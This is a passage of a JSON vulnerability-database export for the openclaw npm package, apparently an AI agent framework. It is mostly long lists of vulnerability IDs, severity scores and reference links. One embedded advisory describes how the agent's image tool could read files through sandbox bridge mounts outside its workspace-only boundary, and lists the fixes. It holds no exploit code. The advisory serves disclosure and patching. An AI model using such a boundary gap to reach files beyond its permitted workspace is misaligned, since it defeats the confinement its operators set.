bility":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m
7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-qyyn-bw9t-r7c4"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-tu4b-f885-eyds"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-h
yha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-v
kbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.2"}],"aliases":["CVE-2026-32004","GHSA-v865-p3gq-hw6m"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-49b4-qwz6-q7he"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91369?format=json","vulnerability_id":"VCID-4hcw-cv74-zkah","summary":"OpenClaw: Image Tool `tools.fs.workspaceOnly` Bypass via Sandbox Bridge Mounts\n## Summary\nThe `image` tool did not fully honor the `tools.fs.workspaceOnly` filesystem boundary. In affected releases, image-path resolution could still traverse sandbox bridge mounts outside the workspace and read files from mounted directories that the other file tools would reject.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: `< 2026.3.2`\n- Fixed: `>= 2026.3.2`\n- Latest released tags checked: `v2026.3.23` (`ccfeecb6887cd97937e33a71877ad512741e82b2`) and `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `dd9d9c1c609dcb4579f9e57bd7b5c879d0146b53`\n- `14baadda2c456f3cf749f1f97e8678746a34a7f4`\n\n## Release Status\nThe complete fix shipped in `v2026.3.2` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- `src/agents/openclaw-tools.ts` now passes `fsPolicy` into `createImageTool`, so the image tool receives the same workspace-only policy input as the other filesystem tools.\n- `src/agents/tools/image-tool.ts`, `src/agents/tools/media-tool-shared.ts`, and `src/agents/sandbox-media-paths.ts` now restrict local roots and sandbox-bridge resolution to the workspace when `tools.fs.workspaceOnly` is enabled.\n\nOpenClaw thanks @YLChen-007 for 
reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35658","reference_id":"","reference_type":"","scores":[{"value":"0.00043","scoring_system":"epss","scoring_elements":"0.13506","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00043","scoring_system":"epss","scoring_elements":"0.13472","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00043","scoring_system":"epss","scoring_elements":"0.13512","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35658"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/14baadda2c456f3cf749f1f97e8678746a34a7f4","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:56:25Z/"}],"url":"https://github.com/openclaw/openclaw/commit/14baadda2c456f3cf749f1f97e8678746a34a7f4"},{"reference_url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system"
:"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:56:25Z/"}],"url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"},{"reference_url":"https://github.com/openclaw/openclaw/commit/ccfeecb6887cd97937e33a71877ad512741e82b2","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:56:25Z/"}],"url":"https://github.com/openclaw/openclaw/commit/ccfeecb6887cd97937e33a71877ad512741e82b2"},{"reference_url":"https://github.com/openclaw/openclaw/commit/dd9d9c1c609dcb4579f9e57bd7b5c879d0146b53","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual",
"scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:56:25Z/"}],"url":"https://github.com/openclaw/openclaw/commit/dd9d9c1c609dcb4579f9e57bd7b5c879d0146b53"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-cfp9-w5v9-3q4h","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:56:25Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-cfp9-w5v9-3q4h"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35658","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35658"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-filesystem-boundary-bypass-in-image-tool","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"6.0","scor
ing_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:56:25Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-filesystem-boundary-bypass-in-image-tool"},{"reference_url":"https://github.com/advisories/GHSA-cfp9-w5v9-3q4h","reference_id":"GHSA-cfp9-w5v9-3q4h","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cfp9-w5v9-3q4h"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74401?format=json","purl":"pkg:npm/openclaw@2026.3.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-2927-2whr-sudd"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h
42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-74bc-hfqh-cbcd"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8v2w-jgh7-6ybq"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x
87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-d
hwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-3xp4-7fdp"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-edn6-zer1-cya4"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-uyfp"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h4av-vgqn-aqcn"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j6nj-gf5b-1khk"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jad8-5duz-dqg1"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-t
shp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kp3a-gr66-zkam"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-m46m-y19r-2kd2"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-qyyn-bw9t-r7c4"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-y
a3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID